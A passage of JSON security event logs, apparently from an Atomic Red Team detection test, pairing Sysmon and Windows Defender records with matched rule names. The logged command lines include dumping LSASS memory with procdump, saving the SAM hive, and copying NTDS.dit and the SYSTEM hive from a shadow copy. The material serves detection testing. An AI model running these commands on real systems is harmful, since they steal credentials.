(WinBuild.160101.0800)","Hashes":"SHA1=3627AD593F3A956FA07382914B52AAB5CE98C817,MD5=72D5E2A3FF5D88C891E0DF1AA28B6422,SHA256=ABB99F7CFD3E9EB294501AAFA082A8D4841278CC39A4FB3DFF9942CA1F71A139,IMPHASH=96A5873241D90136570C05E55F0B5B2A","Image":"C:\\Windows\\System32\\mavinject.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-DA4B-5D31-0000-0010CB413D00","ProcessId":2604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:15.754"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4078,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:15.776993Z"}},"Version":5}}}},{"detection":["Interactive AT Job"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"at 13:20 /interactive cmd","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Schedule service command line interface","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD","Image":"C:\\Windows\\System32\\at.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"at 13:20 /interactive cmd\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DA6A-5D31-0000-0010B2953E00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DA6A-5D31-0000-001004983E00","ProcessId":3864,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management AT","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:46.087"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4083,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:46.094355Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-DA72-5D31-0000-001056513F00","ParentProcessId":3680,"ProcessGuid":"747F3D96-DA72-5D31-0000-0010B1543F00","ProcessId":3160,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:57:54.160"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4101,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:57:54.165319Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-19 15:10:52.699","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ProcessId":5840,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\3ivx11ib\\3ivx11ib.dll","UtcTime":"2019-07-19 
15:10:52.699"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4109,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:10:52.700901Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD8B-5D31-0000-001094584A00","ProcessId":5792,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:07.987"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4110,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:07.994501Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg save HKLM\\sam sam\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD95-5D31-0000-001075964A00","ProcessId":7140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:17.211"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4117,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:17.224751Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Usage of Sysinternals Tools","Suspicious Use of Procdump on LSASS","Renamed ProcDump","LSASS Memory Dumping","Suspicious Use of Procdump","Procdump Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00106E2C4B00","ProcessId":5488,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.626"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4124,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:26.642464Z"}},"Version":5}}}},{"detection":["Shadow Copies Creation Using Operating Systems Utilities"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"vssadmin.exe create shadow /for=C:","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Command Line Interface for Microsoft® Volume Shadow Copy Service ","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=AC561205CD59BBCDB158525978FF65BDF17FDC3C,MD5=614B5C4238977130AA2270C8AD58CE6C,SHA256=D7577FB88CCA3169C7931DC0D8EC9A444227DC14F6C71D6D39D86A0C5CAD1976,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE","Image":"C:\\Windows\\System32\\vssadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"vssadmin.exe create shadow /for=C:\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-DD9E-5D31-0000-00100C3F4B00","ParentProcessId":5036,"ProcessGuid":"747F3D96-DD9E-5D31-0000-00105E414B00","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:26.981"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4129,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:26.989143Z"}},"Version":5}}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\Extract\\ntds.dit\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00101A4A4B00","ProcessId":5772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.156"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4131,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:27.169217Z"}},"Version":5}}}},{"detection":["Copying Sensitive Files with Credential Data"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM C:\\Extract\\VSC_SYSTEM_HIVE\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-DD47-5D31-0000-001015874900","ParentProcessId":5840,"ProcessGuid":"747F3D96-DD9F-5D31-0000-00102D4D4B00","ProcessId":976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
15:11:27.192"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4132,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T15:11:27.202862Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{511224D4-1EB4-47B9-BC4A-37E21F923FED}","Detection Time":"2019-07-18T20:40:00.580Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. 
","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1056\\Get-Keystrokes.ps1","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147725349","Threat Name":"Trojan:PowerShell/Powersploit.M","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":37,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:40:00.730676Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection ID":"{8791B1FB-0FE7-412E-B084-524CB5A221F3}","Detection Time":"2019-07-18T20:40:13.775Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error 
Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1086\\payloads\\test.xsl","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147735426","Threat Name":"Trojan:XML/Exeselrun.gen!A","Type ID":"2","Type Name":"%%823","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":48,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:40:16.396422Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"34","Category Name":"Tool","Detection ID":"{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}","Detection Time":"2019-07-18T20:40:16.697Z","Detection User":"MSEDGEWIN10\\IEUser","Engine 
Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"4","Severity Name":"High","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147708292","Threat Name":"HackTool:JS/Jsprat","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":75,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:16.418508Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"6","Category Name":"Backdoor","Detection ID":"{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}","Detection 
Time":"2019-07-18T20:40:18.385Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 1.1.16100.4","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1100\\shells\\cmd.aspx","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147683177","Threat Name":"Backdoor:ASP/Ace.T","Type ID":"0","Type Name":"%%822","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":76,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:17.508276Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions required","Category ID":"8","Category Name":"Trojan","Detection 
ID":"{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}","Detection Time":"2019-07-18T20:41:40.357Z","Detection User":"MSEDGEWIN10\\IEUser","Engine Version":"AM: 1.1.16100.4, NIS: 0.0.0.0","Error Code":"0x00000000","Error Description":"The operation completed successfully. ","Execution ID":"1","Execution Name":"%%813","FWLink":"https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0","Origin ID":"1","Origin Name":"%%845","Path":"file:_C:\\AtomicRedTeam\\atomic-red-team-master\\atomics\\T1218\\src\\Win32\\T1218-2.dll","Post Clean Status":"0","Pre Execution Status":"0","Process Name":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Product Name":"%%827","Product Version":"4.18.1906.3","Remediation User":"","Severity ID":"5","Severity Name":"Severe","Signature Version":"AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0","Source ID":"3","Source Name":"%%818","State":"1","Status Code":"1","Status Description":"","Threat ID":"2147726426","Threat Name":"Trojan:Win32/Sehyioa.A!cl","Type ID":"8","Type Name":"%%862","Unused":"","Unused2":"","Unused3":"","Unused4":"","Unused5":"","Unused6":""},"System":{"Channel":"Microsoft-Windows-Windows Defender/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1116,"EventRecordID":95,"Execution":{"#attributes":{"ProcessID":6024,"ThreadID":5500}},"Keywords":"0x8000000000000000","Level":3,"Opcode":0,"Provider":{"#attributes":{"Guid":"11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78","Name":"Microsoft-Windows-Windows Defender"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":0,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-18T20:41:48.236136Z"}},"Version":0}}}},{"detection":["(Built-in Logic) - Windows Defender Detections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Action ID":"9","Action Name":"%%887","Additional Actions ID":"0","Additional Actions String":"No additional actions 
